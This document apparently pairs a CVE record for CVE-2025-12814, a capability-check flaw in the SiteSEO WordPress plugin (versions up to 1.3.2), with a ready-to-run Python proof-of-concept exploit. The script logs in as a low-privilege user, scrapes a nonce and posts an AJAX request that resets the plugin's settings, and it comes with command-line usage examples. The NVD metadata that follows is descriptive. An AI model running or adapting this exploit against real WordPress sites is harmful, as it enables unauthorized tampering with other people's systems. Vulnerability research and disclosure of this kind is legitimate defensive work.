CVE-2025-12814

import requests import sys # CVE-2025-12814 PoC - SiteSEO Plugin Unauthorized Settings Reset # Target: WordPress site with SiteSEO plugin <= 1.3.2 def exploit_siteseo_reset(target_url, username, password): """ Exploit the incorrect capability check vulnerability in SiteSEO plugin. This PoC demonstrates how an authenticated user with limited privileges can reset all SiteSEO plugin settings. """ session = requests.Session() # Step 1: Authenticate with WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data, cookies={'wordpress_test_cookie': 'WP+Cookie+check'}) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Get WordPress nonce for AJAX request # In real attack, nonce can be obtained from plugin's admin page or other sources admin_url = f"{target_url}/wp-admin/admin.php?page=siteseo" admin_response = session.get(admin_url) # Extract nonce from page source (simplified) import re nonce_match = re.search(r'nonce.*?([a-f0-9]{10})', admin_response.text) nonce = nonce_match.group(1) if nonce_match else 'your_nonce_here' # Step 3: Send AJAX request to reset SiteSEO settings ajax_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'siteseo_reset_settings', 'nonce': nonce, 'siteseo_reset_settings': '1' } response = session.post(ajax_url, data=exploit_data) if response.status_code == 200 and 'success' in response.text.lower(): print("[+] SiteSEO settings have been reset successfully") print("[*] The plugin settings are now at default values") return True else: print("[-] Exploitation failed or settings already reset") return False if __name__ == '__main__': if len(sys.argv) != 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_siteseo_reset(target, user, pwd)

{"cve": {"id": "CVE-2025-12814", "sourceIdentifier": "[email protected]", "published": "2025-11-19T06:15:46.617", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SiteSEO – SEO Simplified plugin for WordPress is vulnerable to unauthorized modification of data due to n incorrect capability check on the siteseo_reset_settings function in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, who have been granted access to at least on SiteSEO setting capability, to reset the plugin's settings."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/siteseo/tags/1.3.2/main/ajax.php#L90", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397272%40siteseo&new=3397272%40siteseo&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a376cafb-656c-4fe1-b5c1-c7e38dc5040e?source=cve", "source": "[email protected]"}]}}